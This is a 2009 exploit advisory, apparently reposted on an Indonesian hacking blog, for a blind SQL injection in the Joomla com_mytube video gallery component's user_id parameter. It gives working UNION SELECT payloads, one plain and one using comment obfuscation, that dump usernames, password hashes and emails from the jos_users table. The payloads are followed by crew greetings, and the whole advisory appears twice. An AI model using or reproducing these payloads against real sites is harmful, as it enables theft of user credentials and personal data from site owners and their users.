Joomla component com_mytube (user_id) Blind SQLi Vulnerability
[!]========================================[!]
#Joomla Component com_mytube SQLi Vulnerability (id)
#Author : r3m1ck(r3m1ck@hackermail.com)
#Homepage: http://www.r3m1ck.uni.cc/
#Date : 6 Desember, 2009
[!]========================================[!]
[ Software Information ]
#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
[!]========================================[!]
[ Vulnerable File ]
http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck
[ XpL ]
69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck
69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,GROUP_CONCAT
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26/**/FROM/**/jos_users--&option=com_mytube&Itemid=r3m1ck
[!]========================================[!]
[ Thx To ]
[+] U3D Crew | INDONESIAN CODER TEAM | Indonesian Hacker |
[+] otong,elisha,god~of~cats,bl4ck_f4d3,s1mb4h and all U3D Crew
[+] tukulesto,M3NW5,kaMtiEz,n4ck0,ibl13z,bobyhikaru,gonzhack
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-,L0l1ds,bumble_be
[ NOTE ]
[+] Napa seh forum cyber di INDO pada berantem... ayo kita bersatu.. bersatu kita teguh bercerai kita runtuh!!
[+] emak babe ade... maap r3m1ck blm bisa nyari uang sendiri T_T
[+] IchaQcayang : ayo lanjotkan usaha kita cin buat meraih cita !!! luph U
[ QUOTE ]
[+] U3D crew was here !!!!!
[+] nothing secure .. nothing is impossible
#Joomla Component com_mytube SQLi Vulnerability (id)
#Author : r3m1ck(r3m1ck@hackermail.com)
#Homepage: http://www.r3m1ck.uni.cc/
#Date : 6 Desember, 2009
[!]========================================[!]
[ Software Information ]
#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
[!]========================================[!]
[ Vulnerable File ]
http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck
[ XpL ]
69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck
69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,GROUP_CONCAT
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26/**/FROM/**/jos_users--&option=com_mytube&Itemid=r3m1ck
[!]========================================[!]
[ Thx To ]
[+] U3D Crew | INDONESIAN CODER TEAM | Indonesian Hacker |
[+] otong,elisha,god~of~cats,bl4ck_f4d3,s1mb4h and all U3D Crew
[+] tukulesto,M3NW5,kaMtiEz,n4ck0,ibl13z,bobyhikaru,gonzhack
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-,L0l1ds,bumble_be
[ NOTE ]
[+] Napa seh forum cyber di INDO pada berantem... ayo kita bersatu.. bersatu kita teguh bercerai kita runtuh!!
[+] emak babe ade... maap r3m1ck blm bisa nyari uang sendiri T_T
[+] IchaQcayang : ayo lanjotkan usaha kita cin buat meraih cita !!! luph U
[ QUOTE ]
[+] U3D crew was here !!!!!
[+] nothing secure .. nothing is impossible
Komentar
Posting Komentar
Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!